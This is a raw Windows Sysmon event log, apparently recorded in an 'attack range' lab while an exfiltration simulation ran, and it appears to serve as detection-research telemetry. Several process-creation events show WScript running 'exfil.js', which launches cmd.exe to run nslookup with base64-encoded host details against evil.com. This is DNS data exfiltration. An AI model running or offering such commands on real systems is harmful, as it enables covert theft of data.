14:21:28.197{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1F43-000000005F02}7192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1E43-000000005F02}2620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-18E0-629A-6742-000000005F02}39765688C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-1E43-000000005F02}2620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.195{2E1864BB-18E8-629A-1E43-000000005F02}2620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfcum.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.181{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyeod.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-18E8-629A-1C43-000000005F02}74882864C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-1D43-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1D43-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.159{2E1864BB-18E8-629A-1B43-000000005F02}45927324C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-1D43-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.160{2E1864BB-18E8-629A-1D43-000000005F02}6512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-1B43-000000005F02}4592C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyeod.tmp 2>&1 10341000x8000000000000000207698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.127{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-1C43-000000005F02}7488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.127{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-1C43-000000005F02}7488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.127{2E1864BB-18E8-629A-1C43-000000005F02}74882864C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-1B43-000000005F02}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1C43-000000005F02}7488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1B43-000000005F02}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-18E0-629A-6742-000000005F02}39764536C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-1B43-000000005F02}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.118{2E1864BB-18E8-629A-1B43-000000005F02}4592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyeod.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5DECFCAFB33520BB7C5E5C5430BED26,SHA256=E75458A0FB6DF7B11C34A8F560E1CBACB667C3CFE01AF24514D9E1717169342D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000207686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.112{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcoxhk.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000207685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.685{00000000-0000-0000-0000-000000000000}4228<unknown process>-udpfalsefalse127.0.0.1-50555-false127.0.0.1-53domain 354300x8000000000000000207684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.685{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50555- 354300x8000000000000000207683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.685{00000000-0000-0000-0000-000000000000}4228<unknown process>-udptruefalse127.0.0.1-50555-false127.0.0.1-53domain 354300x8000000000000000207682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50554- 354300x8000000000000000207681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.684{00000000-0000-0000-0000-000000000000}4228<unknown process>-udptruefalse127.0.0.1-50554-false127.0.0.1-53domain 354300x8000000000000000207680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.599{00000000-0000-0000-0000-000000000000}6576<unknown process>-udpfalsefalse127.0.0.1-50553-false127.0.0.1-53domain 